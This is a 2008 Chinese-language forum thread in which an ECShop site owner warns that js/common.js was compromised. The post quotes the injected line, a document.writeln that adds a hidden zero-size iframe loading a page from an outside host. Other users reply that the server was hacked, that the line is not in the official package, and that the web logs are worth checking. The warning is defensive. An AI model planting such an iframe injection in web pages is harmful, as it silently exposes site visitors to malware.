‹‹ 上一主题 | 下一主题 ››
 14 12
发新话题
打印

[待解决] 警惕!!!!js/common.js文件被挂马!

ldgm

EC新手

Rank: 1
1# 发表于 2008-7-11 09:05  只看该作者

警惕!!!!js/common.js文件被挂马!

请大家立即检查
js/common.js
这个文件的最后一行是否有

document.writeln("<iframe src=http://jb.ljsrx.com/zz.html style='width: 0px; height: 0px;'></iframe>")

TOP

crazyone

高级会员

Rank: 3Rank: 3
2# 发表于 2008-7-11 09:11  只看该作者
说实话,我真的很想笑!

TOP

ldgm

EC新手

Rank: 1
3# 发表于 2008-7-11 09:27  只看该作者
引用:
原帖由 crazyone 于 2008-7-11 09:11 发表
说实话,我真的很想笑!
想笑???当你被挂的时候看你还笑得出不,无知就不要乱笑!!

一片好心提醒大家注意,居然头一回的贴是想笑

[ 本帖最后由 ldgm 于 2008-7-11 09:28 编辑 ]

TOP

海豚

正式会员

Rank: 2
4# 发表于 2008-7-11 09:30  只看该作者
是你的服务器被黑了,文件被修改了。

ECShop官方提供的下载包里,并没有这一行。

TOP

ldgm

EC新手

Rank: 1
5# 发表于 2008-7-11 09:35  只看该作者
我就是说请大家警惕,不是说官方挂马,唉!

TOP

海豚

正式会员

Rank: 2
6# 发表于 2008-7-11 09:36  只看该作者
那要是这样,挂马者可以把马挂在任何一个文件中啊。

不过,还是谢谢你善意的提醒!

TOP

crazyone

高级会员

Rank: 3Rank: 3
7# 发表于 2008-7-11 10:39  只看该作者

回复 #3 ldgm 的帖子

好心归好心,

照你这个逻辑,你要提醒全世界的站长要注意挂马,只要是网页都有可能被挂,,

不用具体到这个文件吧!

TOP

ldgm

EC新手

Rank: 1
8# 发表于 2008-7-11 10:58  只看该作者
网站被黑,至少说明程序有严重漏洞,FTP密码泄漏造成的可能性很少。

TOP

海豚

正式会员

Rank: 2
9# 发表于 2008-7-11 11:10  只看该作者
我觉得,你需要查看你的WEB服务日志,看看具体是从哪里进来的。

不能这么武断的就说是ECShop的程序有严重的漏洞,它是经过安全部门的严格检测的。
得提出你有力的怀疑证据啊!

TOP

uzou

高级会员

Rank: 3Rank: 3
10# 发表于 2008-7-11 12:26  只看该作者
我已经笑死了,什么都搞不清楚就乱指责EC。有点自作聪明,比如楼猪这类人。

TOP

‹‹ 上一主题 | 下一主题 ››
 14 12
发新话题